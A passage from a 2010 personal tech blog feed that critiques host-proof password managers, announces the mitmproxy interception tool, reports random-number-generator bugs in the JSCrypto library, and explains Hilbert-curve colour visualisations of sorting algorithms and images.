design goal of the Passpack project. So, that's 0 for 2 for Passpack.</p>
<h2 id="the-emperor-sure-looks-naked-to-me">The emperor sure looks naked to me</h2>
<p>I want to make it clear that I wish both these projects well. Their founders
have thrown their hats into the ring, and had the stones to try to make the
host-proof application paradigm work in a commercial setting. Both projects have
published significant libraries for building host-proof apps (see the <a href="http://www.clipperz.com/open_source/javascript_crypto_library">Clipperz
Javascript Crypto
Library</a>, and the
<a href="http://www.passpack.com/en/credits/">Passpack Host-Proof Hosting Library</a>) that
will undoubtedly make the road easier for those who follow in their footsteps.
It's in the interest of all freedom-loving citizens of the Internet that both
these companies prosper, because we need more host-proof applications, not
fewer. However...</p>
<p>Without a client-side that is both secure <strong>and</strong> verified in the sense I
describe above, an application simply isn't "host-proof" in any meaningful
sense. If your application is designed in such a way that you can simply
<strong>ask</strong> your user's browser for their private data, you can't say "we couldn't
access your data even if we wanted to", and you can't say "we've designed our
system so that you don't have to trust us". Now, I can anticipate some of the
response to this statement - people will say that checksum verification isn't
practical, that users wouldn't bother, that an application that sticks
rigorously to the host-proof application principles would be unusable. This
might all be true - but is beside the point. The truth is, if someone hacked
the Clipperz or Passpack servers, they <strong>could</strong> steal bank details or server
passwords or whatever else people keep in their lockers - so we're relying on
the hosts to be secure. And like Google and Facebook, Clipperz and Passpack
<strong>could</strong> access their users' private data - they're just promising that they
won't. Just like everybody else, really.</p>
<p>Luckily, the steps required to fix things are clear. Clipperz made a critical
mistake in choosing DWR for their client-server communications, but that can be
rectified. Passpack needs to abandon its misguided idea that no verification of
the client-side application is needed, and do the work to make this possible.
Passpack already uses JSON for most of its communication - if they used it
consistently for all server communication, their client-side app could be on
solid ground. Both projects need to put on their thinking caps, and come up
with a better way to approach the client-side verification problem. I'm hopeful
that we'll see improvements from both projects in response to this post.</p>
<h2 id="up-next-building-a-minimal-host-proof-application">Up next: building a minimal host-proof application</h2>
<p>All of this started off the exhaustingly monomaniacal hamster-on-a-wheel that I
have where other people have a brain. I found myself awake at 3am, thinking
about host-proof apps, and pondering the ineluctable modalities of the
verification problem. So, I decided to spend some time building a minimal
useful host-proof application to experiment with. Tune in next week for my next
thrilling post, where I build and launch a tiny, experimental and unashamedly
user-hostile host-proof app.</p>
Introducing mitmproxy: an interactive man-in-the-middle proxy
2010-02-16T00:00:00+00:00
2010-02-16T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/announce0_1/
<h1> Update: see <a href="http://mitmproxy.org">mitmproxy.org</a> for recent releases!</h1>
<p>I spend a lot of time poking at web interfaces, both for penetration testing
and generally while developing software. This usually involves iteratively
making small modifications to requests, and running them again and again until
I find a vulnerability or reproduce a bug. Using a browser plugin like
<a href="https://addons.mozilla.org/en-US/firefox/addon/966">tamperdata</a> is great for a
quick first stab at things, but gets clunky quickly. Scripting things up is
usually the next step, and that's fine, but time-consuming and not very agile.</p>
<div class="media">
<a href="mitmproxy-screenshot.png">
<img src="mitmproxy-screenshot.png" />
</a>
</div>
<p>So, I'm releasing <strong>mitmproxy</strong> - an interactive, SSL-aware man-in-the-middle
proxy that lets you view, modify and replay HTTP connections. It's aimed at
software developers and penetration testers (i.e. people like me), who need to
intensively tamper with and monitor HTTP traffic. Using it, you can point your
browser at a page that loads a bazillion images and 50 snippets of JSON, pick
out the one request you're interested in, and modify and replay it over and
over. You have complete control over both requests and responses - you can edit
headers and content using your preferred text editor, and change HTTP request
methods on the fly. You can view request and response contents using an external
viewer (picked using your mailcap configuration), or using <strong>mitmproxy</strong>'s built
in text and hexdump-like viewers. Filters and intercepts are specified using
regular expressions and a pretty complete mutt-like expression language.</p>
<p>Another useful feature is something I call "sticky cookies". I often need to
make requests using an authenticated session. This is a pain when logins are
action. Copying cookie values around or scripting up the login process gets old
quick. So, <strong>mitmproxy</strong> lets you set cookies on requests matching a specified
expression as "sticky", which means that requests without a cookie inherit
previously seen cookie values. So, you can log in to the target site once using
your browser, and subsequent requests using tools like <strong>curl</strong> will
automagically look like they're part of an authenticated session.</p>
<p>I've just sliced <strong>mitmproxy</strong> raw and quivering out of a much larger internal
problems.</p>
<p>You can find releases and documentation for <strong>mitmproxy</strong>
<a href="http://mitmproxy.org">here</a>. As usual, the real action is at the project's
<a href="http://github.com/cortesi/mitmproxy">git repository</a>.</p>
Timsort - a study in grayscale
2010-01-28T00:00:00+00:00
2010-01-28T00:00:00+00:00
https://corte.si/posts/code/timsort-grayscale/
<div class="media">
<a href="timsort.png">
<img src="timsort.png" />
</a>
</div>
<p>A <a href="https://corte.si/posts/code/sortvis-fruitsalad/">couple of days ago</a> I published a
set of explosion-in-a-crayola-factory colourful sorting algorithm
visualisations, using a colour sequence generated with the Hilbert curve. The
idea was that using a space-filling curve to traverse the RGB colour cube we
could get a large number of distinct but visually ordered colours. I contrasted
this with a more common method, which is to vary the intensity of a monotone to
generate a gradient of colours. A couple of people suggested that I provide a
set of grayscale images for comparison. I was curious about this too, so I
hacked a grayscale generator into <a href="http://github.com/cortesi/sortvis">sortvis</a>.
The results were striking, but not interesting enough to reproduce here in full.
Subjectively, I think the coloured images do allow you to follow more of the
detail in these dense visualisations, but I'm not wedded to the idea. Being able
to visually judge the order of elements in a sorting algorithm visualisation is
important, and that is something we sacrifice in the Hilbert RGB traversal. I
still like my <a href="https://corte.si/posts/code/visualisingsorting/">earlier sparse grayscale
visualisations</a> best.</p>
<p>If you're curious, you can check out
<a href="http://github.com/cortesi/sortvis">sortvis</a> and generate the full set of
grayscale graphs with the following command:</p>
<pre style="background-color:#2b303b;">
<code>./dense -g -n 512
</code></pre>
<p>I did think the grayscale version of Python's
<a href="https://corte.si/posts/code/timsort/">Timsort</a> was worth sharing. It's pretty
spectacular due to a purely coincidental 3d effect - not much good for
explaining Timsort, but I'd hang it on my wall, for sure.</p>
Hilbert Curve + Sorting Algorithms + Procrastination = ?
2010-01-26T00:00:00+00:00
2010-01-26T00:00:00+00:00
https://corte.si/posts/code/sortvis-fruitsalad/
<p>I like the Hilbert curve. I like sorting algorithm visualisations. I
occasionally procrastinate when I should be doing more important things. When
all these factors converge, the result is a post like this.</p>
<p>In a <a href="https://corte.si/posts/code/hilbert/portrait/">previous post</a>, I drew a picture
of a Hilbert curve by projecting a Hilbert curve traversal of the RGB colour
cube onto a Hilbert curve traversal of the plane (yes, it's a mouthful, but it's
a mouthful of awesome). Since then, I've been pondering the general utility of
Hilbert curve traversals of the colour cube. In large-scale visualisation, we
often want to choose an ordered sequence of colours that have the property that
colours close to each other on the sequence are also close to each other
visually. The easy way to do this is to restrict yourself to a specific hue, and
to vary the intensity. I used this idea in grayscale to generate some previous
<a href="https://corte.si/posts/code/visualisingsorting/">sorting algorithm visualisations</a>:</p>
<div class="media">
<a href="insertionsort.png">
<img src="insertionsort.png" />
</a>
<div class="subtitle">
Insertion sort
</div>
</div>
<p>The problem with this approach is that it hugely restricts the number of
distinct colours we can use. There are only so many distinct shades of gray the
human eye can perceive - I'm already pushing it with 20 distinct colours in the
image above. We can do much, much better using the Hilbert curve. Lets assume
that human perception of RGB colours is uniform and consistent - that is, that
any change along the RGB axes will result in uniformly proportional difference
in perceived colour. This assumption is incorrect, but it's good enough as a
first approximation. By traversing the RGB colour cube in Hilbert order, we can
get a set of colours that are maximally distinct from each other, with
near-optimal colour locality preservation (keeping in mind that perfect
locality preservation is impossible). In other words, an equidistant sequence
of colours that are simultaneously as different from each other as possible,
and where colours 'close' to each other on the sequence are as similar as
possible. The result is a colour sequence that looks like this:</p>
<div class="media">
<a href="swatch.png">
<img src="swatch.png" />
</a>
<div class="subtitle">
512-colour Hilbert-order swatch
</div>
</div>
<p>We do, of course, pay a price for this mathematical marvel: we can't visually
compare colours and see their order in the spectrum. When we really want a
large ordered sequence of colours, this can be an acceptable tradeoff.</p>
<p>Below is a re-imagining of my previous sorting algorithm visualisations, at a
much larger scale than I could achieve using shades of gray. Each image shows a
random list of 512 elements being sorted. The images are at a 1-pixel per
element resolution, and each element has a distinct colour along the Hilbert
RGB cube traversal. The aspect ratios differ, because the width of the images
are equal to the number of element swaps that occur during the sorting process.
I've left out a number of algorithms that end up being too "wide" to be
enjoyable - shellsort and bubblesort, I'm looking at you. Oh, and I make
absolutely no claims that these particular visualisations are useful or
informative. I made them for the same reason Mallory climbed Everest and the
chicken crossed the road: because it's there, and to see what's on the other
side. Come to think of it, the Mallory-Chicken Impetus explains rather a lot of
what I do.</p>
<h3 id="selection-sort">Selection sort</h3>
<div class="media">
<a href="selectionsort.png">
<img src="selectionsort.png" />
</a>
<div class="subtitle">
Selection sort
</div>
</div>
<h2 id="insertion-sort">Insertion sort</h2>
<div class="media">
<a href="insertionsort.png">
<img src="insertionsort.png" />
</a>
<div class="subtitle">
Insertion sort
</div>
</div>
<h3 id="python-s-timsort">Python's Timsort</h3>
<p>I explained the pattern you see below in a <a href="https://corte.si/posts/code/timsort/">previous post visualising
Timsort</a>.</p>
<div class="media">
<a href="timsort.png">
<img src="timsort-small.png" />
</a>
<div class="subtitle">
Timsort
</div>
</div>
<h3 id="quicksort">Quicksort</h3>
<div class="media">
<a href="quicksort.png">
<img src="quicksort-small.png" />
</a>
<div class="subtitle">
Quicksort
</div>
</div>
<h2 id="the-code">The code</h2>
<p>As usual, I've published the code used to draw the images in this post. I
extended <a href="http://github.com/cortesi/scurve">scurve</a>, where I'm collecting
algorithms and visualisation techniques related to space-filling curves, to draw
colour swatches. Then I added added a "fruitsalad" visualisation technique to
<a href="http://github.com/cortesi/sortvis">sortvis</a>, which houses my sorting algorithm
visualisation code.</p>
An email to the authors of JSCrypto
2010-01-14T00:00:00+00:00
2010-01-14T00:00:00+00:00
https://corte.si/posts/security/jscrypto/
<div class="media">
<a href="facepalm.jpg">
<img src="facepalm.jpg" />
</a>
</div>
<p><strong>[Update: A fix for these problems and one noted by Peter Burns in the comments
to this post has been posted. <a href="http://crypto.stanford.edu/sjcl/">Get it while it's
hot</a>, folks.]</strong></p>
<p>Hi folks,</p>
<p>Thanks for a <a href="http://crypto.stanford.edu/sjcl/">blazingly fast little crypto
library</a>. Please find below a few comments on
the code.</p>
<p>There's an error in the <strong>is_ready</strong> function of the random number generator.
On line 1386 of the <strong>jscrypto.js</strong> file, you have:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">return </span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">this</span><span style="color:#c0c5ce;">._pool_entropy[</span><span style="color:#d08770;">0</span><span style="color:#c0c5ce;">] > </span><span style="color:#bf616a;">this</span><span style="color:#c0c5ce;">._BITS_PER_RESEED &&
new </span><span style="color:#ebcb8b;">Date</span><span style="color:#c0c5ce;">.</span><span style="color:#96b5b4;">valueOf</span><span style="color:#c0c5ce;">() > </span><span style="color:#bf616a;">this</span><span style="color:#c0c5ce;">._next_reseed) ?
</span></code></pre>
<p>This should be:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">return </span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">this</span><span style="color:#c0c5ce;">._pool_entropy[</span><span style="color:#d08770;">0</span><span style="color:#c0c5ce;">] > </span><span style="color:#bf616a;">this</span><span style="color:#c0c5ce;">._BITS_PER_RESEED &&
new </span><span style="color:#ebcb8b;">Date</span><span style="color:#c0c5ce;">().</span><span style="color:#96b5b4;">valueOf</span><span style="color:#c0c5ce;">() > </span><span style="color:#bf616a;">this</span><span style="color:#c0c5ce;">._next_reseed) ?
</span></code></pre>
<p>In Safari, this will cause an error and script termination. In Firefox, the
effect is much worse - <b>new Date.valueOf()</b> returns an object, which never
compares as greater than any integer. As an unfortunate consequence, that clause
can never evaluate to true, and your <a
href="http://en.wikipedia.org/wiki/Fortuna_(PRNG)">Fortuna</a> implementation's
periodic reseeding never triggers...</p>
<p>All is not lost, though, because luckily the <strong>random_words</strong> function in which
the return value from <strong>is_ready</strong> is used makes no sense. ;-) To start with, on
line 1289 you have:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">readiness </span><span style="color:#c0c5ce;">== </span><span style="color:#bf616a;">this</span><span style="color:#c0c5ce;">.NOT_READY)
</span></code></pre>
<p>But readiness here is a bit field, and this clause will evaluate to false in
half the situations that <strong>is_ready</strong> actually does return NOT_READY. You
surely want</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">readiness </span><span style="color:#c0c5ce;">& </span><span style="color:#bf616a;">this</span><span style="color:#c0c5ce;">.NOT_READY)
</span></code></pre>
<p>Three lines further down, you have:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">else if </span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">readiness </span><span style="color:#c0c5ce;">&& </span><span style="color:#bf616a;">this</span><span style="color:#c0c5ce;">.REQUIRES_RESEED)
</span></code></pre>
<p>This, again, doesn't do what it seems - && is the boolean and, not the bitwise
and. Since <strong>this.REQUIRES_RESEED</strong> is simply a positive constant, that really
becomes:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">else if </span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">readiness</span><span style="color:#c0c5ce;">)
</span></code></pre>
<p>So despite the bug in <strong>is_ready</strong>, your reseeding function actually runs every
time random data is requested. Phew - who says two wrongs don't make a right,
ey? Reseeding every time data is requested might open the generator to some
interesting entropy exhaustion attacks, but is much better than not reseeding at
all.</p>
<p>A corollary to all this is that you also need to address the fact that the the
return value from <strong>is_ready</strong> is used incorrectly in the rest of your code and
your examples. As it stands, testing for readiness with</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">(</span><span style="color:#ebcb8b;">Random</span><span style="color:#c0c5ce;">.</span><span style="color:#bf616a;">is_ready</span><span style="color:#c0c5ce;">())
</span></code></pre>
<p>is wrong, because your readiness function can return <strong>REQUIRES_RESEED |
NOT_READY</strong>, which is a positive integer. I'd recommend changing the interface
of <strong>is_ready</strong> to have an obvious boolean return value instead, though -
typing</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">if </span><span style="color:#c0c5ce;">(</span><span style="color:#ebcb8b;">Random</span><span style="color:#c0c5ce;">.</span><span style="color:#bf616a;">is_ready</span><span style="color:#c0c5ce;">() & </span><span style="color:#ebcb8b;">Random</span><span style="color:#c0c5ce;">.IS_READY)
</span></code></pre>
<p>is a bit of a mouthful.</p>
<p>Thanks again for jscrypto.</p>
<br/>
<br/>
<p>Regards,</p>
<br/>
<p>Aldo</p>
<p><strong>[No animals were harmed producing this post. Content lightly edited for
markup and formatting from the original email. Yes, I really do like JSCrypto -
this error-hiding-an-error was amusing, but the AES implementation seems good
(although the jury's still out on the SHA256 portion).]</strong></p>
Generating colour maps with space-filling curves
2010-01-07T00:00:00+00:00
2010-01-07T00:00:00+00:00
https://corte.si/posts/code/hilbert/swatches/
<p>After my post about my <a href="https://corte.si/posts/code/hilbert/portrait/">Quixotic quest to draw a portrait of the Hilbert
curve</a>, Chris Mueller pointed me to some
<a href="http://visualmotive.com/colorsort/">fascinating related work</a> he had done
generating colour maps of images. Chris's method was to extract the colours
from an image, sort them in natural order, and then draw the pixels out onto a
Hilbert curve. The results are pretty, but have a blotchiness that demonstrates
the poor clustering properties of a natural order sort nicely. If you've read my
previous post (you have, haven't you?), you'll be immediately struck by the idea
that we can improve this by sorting the pixels in order of the 3d Hilbert curve
traversal of the RGB colour cube (you were, weren't you?). This would give us
near optimal clustering, keeping similar colours together and eliminating the
blotchiness. If we have a Hilbert-order sorting of the pixels, we can also
project this onto other traversals of the pixels of the destination image. Using
the ZigZag curve I introduced in the previous post produces a very nice result
too, showing that the order in which the RGB cube is traversed is more important
than the destination map.</p>
<p>In the images below, <strong>natural</strong> is a natural-order colour sort projected onto
a Hilbert curve (Chris's method), <strong>hilbert</strong> is a Hilbert-curve order colour</p>
<p>sort projected onto a Hilbert curve, and <strong>zigzag</strong> is a Hilbert-curve order
colour sort projected onto a ZigZag curve. I've used the same images Chris used
to make comparison with his other interesting visualisations easy.</p>
<div class="media left">
<a href="original_candleslime.png">
<img src="original_candleslime.png" />
</a>
</div>
<div class="content">
<div class="row">
<div class="column">
<img src="natural_candleslime.png"/>
<div>natural</div>
</div>
<div class="column">
<img src="hilbert_candleslime.png"/>
<div>hilbert</div>
</div>
<div class="column">
<img src="zigzag_candleslime.png"/>
<div>zigzag</div>
</div>
</div>
</div>
<div class="media left">
<a href="original_girlpeach.png">
<img src="original_girlpeach.png" />
</a>
</div>
<div class="content">
<div class="row">
<div class="column">
<img src="natural_girlpeach.png"/>
<div>natural</div>
</div>
<div class="column">
<img src="hilbert_girlpeach.png"/>
<div>hilbert</div>
</div>
<div class="column">
<img src="zigzag_girlpeach.png"/>
<div>zigzag</div>
</div>
</div>
</div>
<div class="media left">
<a href="original_landscape.png">
<img src="original_landscape.png" />
</a>
</div>
<div class="content">
<div class="row">
<div class="column">
<img src="natural_landscape.png"/>
<div>natural</div>
</div>
<div class="column">
<img src="hilbert_landscape.png"/>
<div>hilbert</div>
</div>
<div class="column">
<img src="zigzag_landscape.png"/>
<div>zigzag</div>
</div>
</div>
</div>
<div class="media left">
<a href="original_tents.png">
<img src="original_tents.png" />
</a>
</div>
<div class="content">
<div class="row">
<div class="column">
<img src="natural_tents.png"/>
<div>natural</div>
</div>
<div class="column">
<img src="hilbert_tents.png"/>
<div>hilbert</div>
</div>
<div class="column">
<img src="zigzag_tents.png"/>
<div>zigzag</div>
</div>
</div>
</div>
<div class="media left">
<a href="original_tigersnack.png">
<img src="original_tigersnack.png" />
</a>
</div>
<div class="content">
<div class="row">
<div class="column">
<img src="natural_tigersnack.png"/>
<div>natural</div>
</div>
<div class="column">
<img src="hilbert_tigersnack.png"/>
<div>hilbert</div>
</div>
<div class="column">
<img src="zigzag_tigersnack.png"/>
<div>zigzag</div>
</div>
</div>
</div>
<h2 id="sources">Sources</h2>
<p>The images are from the Flickr Creative Commons collection. The tiger image is
© <a href="http://www.flickr.com/photos/nikonvscanon/2427517125/">David Blaikie</a>.
The girl image is © <a href="http://www.flickr.com/photos/savannahgrandfather/312427606/">Bruce
Tuten</a>. The still
life is ©
<a href="http://www.flickr.com/photos/8363028@N08/3077370592/in/photostream/">DeusXFlorida</a>.
The beach image is © <a href="http://www.flickr.com/photos/hamed/2476599906/">Hamed
Saber</a>. The tent image is
© <a href="http://www.flickr.com/photos/drusbi/1318108463/">drusbi</a>.</p>
<h2 id="the-code">The code</h2>
<p>I've updated the <a href="http://github.com/cortesi/scurve">scurve</a> project (where I'm
collecting algorithms and visualisation tools related to space-filling curves)
to include a "colormap" tool to generate colour maps. The images above were can
be generated using commands of the following form:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;"> </span><span style="color:#bf616a;">colormap -s</span><span style="color:#c0c5ce;"> 128</span><span style="color:#bf616a;"> -c </span><span style="color:#b48ead;">[</span><span style="color:#c0c5ce;">colour traversal</span><span style="color:#b48ead;">]</span><span style="color:#bf616a;"> -m </span><span style="color:#b48ead;">[</span><span style="color:#c0c5ce;">map</span><span style="color:#b48ead;">]</span><span style="color:#c0c5ce;"> src destination
</span></code></pre>
<p>There are a lot of other striking permutations and combinations to explore -
the colour traversal and destination map can be any of the space-filling curves
supported by <strong>scurve</strong>.</p>
Portrait of the Hilbert curve
2010-01-03T00:00:00+00:00
2010-01-03T00:00:00+00:00
https://corte.si/posts/code/hilbert/portrait/
<div class="media">
<a href="hilbert2d-o4.png">
<img src="hilbert2d-o4.png" />
</a>
<div class="subtitle">
Hilbert curve of order 4
</div>
</div>
<p>The <a href="http://en.wikipedia.org/wiki/Hilbert_curve">Hilbert curve</a> is a remarkable
construct in many ways, but the thing that makes it <em>useful</em> in computer science
is the fact that it has good clustering properties. If we take a curve like the
one above and straighten it out, points that are close together in the
two-dimensional layout will also tend to be close together in the linear
sequence. I say "tend to be", because we can never get this perfectly right -
we can show that any curve of this type will have some points that are close to
each other spatially but far from each other on the curve.
<a href="http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.37.3138&rep=rep1&type=pdf">It</a>
<a href="http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.129.1888&rep=rep1&type=pdf">turns</a>
<a href="http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.24.8236&rep=rep1&type=pdf">out</a>,
however, that the clustering behaviour of the Hilbert curve is pretty much as
good as we can currently get. For one example of how this property can be
useful, imagine that we have a database with two indexes - X and Y. We know that
we will be doing frequent queries on those indexes, asking for records where X
and Y fall within specified ranges. We can visualise this as retrieving
rectangular regions from a two-dimensional space. Given this scenario, how can
we lay out the records on disk to minimise disk access? Information on disk is
stored sequentially, so what we want is a layout that maximises the likelihood
that records in any given rectangular region will also be adjacent on disk. In
other words, what we want is a way to order our two-dimensional space of records
so that records close to each other in two dimensions also tend to be close to
each other in the sequential order. This is exactly the outstanding property of
the Hilbert curve, so one solution is to store our records on disk in Hilbert
order.</p>
<h2 id="visualising-the-hilbert-curve-a-first-stab">Visualising the Hilbert curve: A first stab</h2>
<p>I've long felt that the usual visualisation of the Hilbert curve - like the one
shown at the top of this post - doesn't really do its clustering properties
justice. The lines-and-vertices approach demonstrates how to <em>construct</em> the
curve very nicely, but it doesn't give us any intuitive feel for how close
points on the curve are to each other on the plane. In the remainder of this
post, I take a stab at visualising the Hilbert curve as the great mathematician
in the sky intended - completely covering the plane, and with each pixel
visually encoding its proximity to its neighbours along the curve.</p>
<p>One way to proceed would be to find a way to assign a colour every pixel in a
Hilbert-order traversal of a square image. Imagine the RGB colour space as a
cube where each colour is uniquely identified by a set of (r, g, b)
co-ordinates. Here's one with 20 colours to a side:</p>
<div class="media">
<a href="ccube.png">
<img src="ccube.png" />
</a>
<div class="subtitle">
A 20x20x20 RGB colour cube
</div>
</div>
<p>We'll use a somewhat larger colour cube - 256 colours to a side, giving us 16
777 216 unique colours. This colour cube is familiar to pretty much everyone,
since it's precisely the colour space we use when we specify HTML-style #rrggbb
colours. We can project the RGB colour cube at 1:1 resolution onto a square with
4096 pixels to a side - this exactly matches a Hilbert curve of order 12. Now we
need a method for traversing the colours in the colour cube. One trivial way to
do this is to simply snake through all the points in the cube. In two
dimensions, it would look like this:</p>
<div class="media">
<a href="zigzag-o4.png">
<img src="zigzag-o4.png" />
</a>
<div class="subtitle">
16x16 Zigzag
</div>
</div>
<p>This generalises to 3 or more dimensions easily - just imagine "stacking"
plates of two-dimensional traversals in such a way that one plate's end point
is adjacent to the next plate's starting point. For want of a better term, I've
called this Zigzag order. When we project a Zigzag traversal of the RGB
colourspace onto a Hilbert-order traversal of the plane, we get this:</p>
<div class="media">
<a href="hilbert-zigzag-fullsize.png">
<img src="hilbert-zigzag-small.png" />
</a>
<div class="subtitle">
Zigzag on Hilbert
</div>
</div>
<p>That's... ugly. You can vaguely make out the shape of the Hilbert curve by
dividing the image into quadrants, and traversing them in the order in which
they blend into each other. But there's a problem - if we traverse the RGB
colour space in Zigzag order, many colours that are close to each other in 3d
space - and therefore visually similar - are quite far from each other in our
traversal order. This is what causes the blotchy artifacts in the image above.
What we really want is a traversal of the RGB colour space that is as smooth and
continuous as possible - meaning that colours that are close to each other in
the cube are also as close as possible to each other in the traversal order.
Wait a minute... that sounds familiar, doesn't it?</p>
<h2 id="drawing-the-hilbert-curve-in-n-dimensions">Drawing the Hilbert curve in N dimensions</h2>
<p>What we really want is a 3d Hilbert curve traversal of the RGB colour cube. This
would mean that our colour clustering - making sure that similar colours are as
close as possible to each other in the sequence - would be close to optimal. We
should then see the clustering properties of the 2d Hilbert curve as patches of
similar colour. So, does a 3d analogue to the Hilbert curve exist? Sure it does - here's
a somewhat befuddling picture of an example rendered with POV-Ray:</p>
<div class="media">
<a href="hilbert3d-o3.png">
<img src="hilbert3d-o3.png" />
</a>
<div class="subtitle">
3d Hilbert curve of order 3 - the green bulb is the start of the curve
</div>
</div>
<p>We can do even better than 3 dimensions, though, by generalising the Hilbert
curve to N dimensions. Concretely, we would like to find a way to translate an
offset along the N-dimensional Hilbert curve to co-ordinates, and vice-versa.
The algorithms to do this are somewhat tricky, but are well known and widely
described. A particularly nice exposition can be found in the paper <a href="http://www.cs.dal.ca/research/techreports/cs-2006-07">"Compact
Hilbert Indices"</a> by Chris
Hamilton. This section is based on Hamilton's version of the classic algorithm
first devised by A. R. Butz in the 1970s (though, see comments in my code for
corrections to some minor errors in the paper that may trip up implementers).</p>
<p>We start with a slight detour - the surprising connection between the Hilbert
curve and <a href="http://en.wikipedia.org/wiki/Gray_code">Gray codes</a>. Recall that Gray
codes are a way to traverse all numbers of a given bit width in such a way that
only one bit differs from each value to the next. Here, for example, are the
2-bit and 3-bit Gray codes:</p>
<h3 id="2-bit">2-bit</h3>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">0, 0
0, 1
1, 1
1, 0
</span></code></pre><h3 id="3-bit">3-bit</h3>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">0, 0, 0
0, 0, 1
0, 1, 1
0, 1, 0
1, 1, 0
1, 1, 1
1, 0, 1
1, 0, 0
</span></code></pre>
<p>Now, watch what happens when we treat each set of bits in the N-bit Gray code
as co-ordinates in N-dimensional space (with X being the rightmost bit), and
draw the resulting curves:</p>
<table class="spacertable">
<tr>
<th width="50%">
2-bit
</th>
<th>
3-bit
</th>
<tr>
<td valign="top">
<img src="hilbert2d-o1.png" alt="Hilbert 2d O1"/>
</td>
<td valign="top">
<img src="hilbert3d-o1.png" alt="Hilbert 3d O1"/>
</td>
</tr>
</tr>
</table>
<p>Voila, the Order 1 Hilbert curves in 2 and 3 dimensions! A bit of pondering
shows that this generalises to any dimension - if we have a hypercube with
dimensions 1x1x1..., the Gray code will traverse all the vertices of the cube
by changing only one dimension at a time. Specifically, we can say that the
N-bit Gray code is a Hilbert order traversal of the vertices of an
N-dimensional hypercube. Effectively, this means that we can now draw the Order
1 Hilbert curve for any dimension - so let's refresh our memories of how the
Order 1 curve relates to the higher orders.</p>
<table class="spacertable">
<tr>
<th> O1 </th>
<th> O2 </th>
<th> O3 </th>
</tr>
<tr>
<td>
<img src="hilbert2d-o1-marked.png" alt="Hilbert 2d O1"/>
</td>
<td>
<img src="hilbert2d-o2-marked.png" alt="Hilbert 2d O2"/>
</td>
<td>
<img src="hilbert2d-o3-marked.png" alt="Hilbert 2d O3"/>
</td>
</tr>
</table>
<p>Notice that as we move from one order to the next, we replace each vertex with
a sub-curve that has the same shape as the <strong>O1</strong> traversal. I've marked one
path through this recursive process in the images above, showing the subcurve
for the upper-left vertex in every step of the recursion. At every step, we
also need to transform the subcurve through rotation and reflection to make
sure that its start matches the end of the previous subcurve, and its end
matches the beginning of the next subcurve. This process generalises trivially
to N dimensions. Since the <strong>O1</strong> curve is just a Gray code traversal of the
N-dimensional cube, we can think of the Order M Hilbert curve as a collection
of hypercubes nested M deep.</p>
<p>Now, let's see if we can use this construction process to figure out the
co-ordinates of a point, given the offset along the Hilbert curve. We'll ignore
the rotations and reflections for the moment. We start with the <strong>O1</strong> curve of
dimension N, and the N most significant bits of the offset. By checking which
vertex of the hypercube this maps to, we can peel off the most significant bit
of each co-ordinate. For example, if we wanted to locate offset 63 in the
2-dimensional Order 3 curve (the upper-left corner), our first two bits would
be (1, 1). This is the fourth point in the Gray code traversal of the
hypercube, which gives us the upper-left quadrant of the <strong>O1</strong> cube. We now
know that the most significant bit of our X co-ordinate is 0, and the most
significant bit of our Y co-ordinate is 1. Doing the same thing for the
matching sub-hypercube in the <strong>O2</strong> curve will give us the next bit, and we
can drill down through the hypercubes in this way peeling off one bit of each
co-ordinate, until we have all M bits. This process also works in reverse - if
we start with a set of co-ordinates, we can drill down through the hypercubes,
determining N bits of the curve offset at every step. So, generally, at every
step of the Gray code recursion we get a nested hypercube of dimension N, and N
bits of co-ordinate or offset information. Finally, we need to deal with the
rotations and reflections required to make the heads and tails of the Gray code
subcurves match up. We'll need to perform this transformation at every step,
before we extract our information bits. All we need is a way to rotate and
reflect a given hypercube to make its beginning and end match up with its
position on the curve. The transform required turns out to map to a simple set
of bit operations described in Section 2.3.1 of Hamilton's paper.</p>
<p>And that's it - using this general process, we can now calculate co-ordinates
or offsets for points on an N-dimensional Hilbert curve. Hopefully, I've
managed to give some intuition for how this algorithm works, but I've glossed
over pretty much all the details. See the original paper or the code I'm
publishing for specifics. I should also note in passing that this is just one
way to draw the Hilbert curve - at higher dimensions there are many, many
different well-formed Hilbert curves.</p>
<h2 id="a-portrait-of-the-hilbert-curve-as-a-young-fruit-salad">A portrait of the Hilbert curve as a young fruit salad</h2>
<p>At last we are in a position to traverse the 3-dimensional RGB cube in Hilbert
order, and have another stab at visualising the 2d Hilbert curve.</p>
<div class="media">
<a href="hilbert-hilbert-fullsize.png">
<img src="hilbert-hilbert-small.png" />
</a>
<div class="subtitle">
Hilbert on Hilbert
</div>
</div>
<p>Ladies and gentlemen, I present a Hilbert curve traversal of the
three-dimensional RGB colour space, projected onto a two-dimensional Hilbert
curve covering the plane. I think it's absolutely damn beautiful. Like some
weird piece of abstract art - a Kandinsky or perhaps a Pollock - the more you
look at this image, the more structure you see. If you divide it into quadrants,
and sub-quadrants, and sub-sub-quadrants, you can trace the path of the Hilbert
curve at every level of recursion by following the flow of colours (use the 2d
Hilbert curves elsewhere in this post for reference if you're having trouble).
If you're looking at the full-size image, this works even at very large
magnifications, until the human ability to perceive colour differences starts to
fail. Incredibly, this image contains <em>exactly</em> the same set of colours as the
unattractive Zigzag visualisation at the start of the post - the only difference
is the way the colours are arranged. This is so remarkable that you might want
to verify this yourself using the colour analysis functionality of your
favourite image editor (make sure you use the full-size images for best effect).
